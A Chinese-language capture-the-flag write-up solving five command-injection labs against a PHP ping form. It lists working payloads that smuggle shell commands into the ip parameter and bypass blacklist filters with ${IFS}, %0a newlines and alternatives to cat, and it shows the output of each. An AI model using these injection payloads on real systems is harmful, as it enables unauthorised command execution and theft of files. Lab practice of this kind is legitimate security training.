RCE绕过靶场练习

目录

CTF-01

CTF-02

CTF-03

CTF-04

CTF-05

---

CTF-01

测试回显

Array
(
    [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
    [1] => 64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.028 ms
    [2] => 64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.059 ms
    [3] => 64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.065 ms
    [4] => 64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.060 ms
    [5] => 
    [6] => --- 127.0.0.1 ping statistics ---
    [7] => 4 packets transmitted, 4 packets received, 0% packet loss
    [8] => round-trip min/avg/max = 0.028/0.053/0.065 ms
)

?ip=127.0.0.1;ls

Array
(
    [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
    [1] => 64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.040 ms
    [2] => 64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.058 ms
    [3] => 64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.063 ms
    [4] => 64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.068 ms
    [5] => 
    [6] => --- 127.0.0.1 ping statistics ---
    [7] => 4 packets transmitted, 4 packets received, 0% packet loss
    [8] => round-trip min/avg/max = 0.040/0.057/0.068 ms
    [9] => 858195988072.php
    [10] => index.php
)

?ip=127.0.0.1;cat 858195988072.php|base64

解码拿到flag

 

CTF-02

cat更多绕过如下

cat 由第一行开始显示内容，并将所有内容输出

tac 从最后一行倒序显示内容，并将所有内容输出

more 根据窗口大小，一页一页的现实文件内容

less 和 more 类似，但其优点可以往前翻页，而且可以搜索字符

head 只显示头几行

tail 只显示最后几行

nl 类似于 cat -n ，显示时输出行号

CTF-03

空格绕过如下

IFS$9 、 %09 、 < 、 > 、 <> 、 {,} 、 %20 、 ${IFS}

127.0.0.1;cat${IFS}flag_26686108321431.php|base64

CTF-04

本题过滤目录分隔符

127.0.0.1;ls flag_is_here

[9] => flag_45342181814693.php

127.0.0.1;cd flag_is_here;cat flag_45342181814693.php|base64

CTF-05

  if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } 

%0a：回车

%0d：换行

payload 绕过

?ip=127.0.0.1%0acd${IFS}f***_is_here%0aless${IFS}f***_1791377478478.php